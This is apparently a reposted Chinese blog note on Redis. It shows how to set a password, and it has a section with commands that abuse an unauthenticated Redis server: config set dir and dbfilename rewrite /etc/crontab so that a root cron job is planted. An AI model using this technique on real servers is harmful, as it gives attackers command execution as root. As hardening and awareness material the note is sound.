一、设置密码
方法1:编辑配置文件(需要重启redis才能生效)
vi /usr/local/redis/conf/redis.conf
requirepass 'test123'
设置密码后操作redis的方法
(1)交互操作
redis-cli auth 'test123'
(2)非交互式的操作
redis-cli -a 'test123' info
方法2:(无需重启redis):
auth 'test123' #加完密码后,需要使用auth去认证才能操作redis服务器 config get requirepass #获取指定配置 config set requirepass '' #无需重启redis服务器将密码置为空,平滑更新配置 config rewrite #更新配置完后需要写入到配置文件,预防重启后配置失效 config set requirepass 'tester123' #重新设置密码
二、攻 击无密码redis服务器(rdb存储)
redis-cli -h xxx.xxx.xxx.xxx config set dir /etc/ redis-cli -h xxx.xxx.xxx.xxx config set dbfilename "crontab"
vi /tmp/attack的内容(需要四个回车)
* * * * * root echo 'attack'
cat /tmp/attack | redis-cli -h xxx.xxx.xxx.xxx -x set attack #-x会从标准输出中读取 redis-cli -h 127.0.0.1 save
转载于:https://blog.51cto.com/9473774/2358479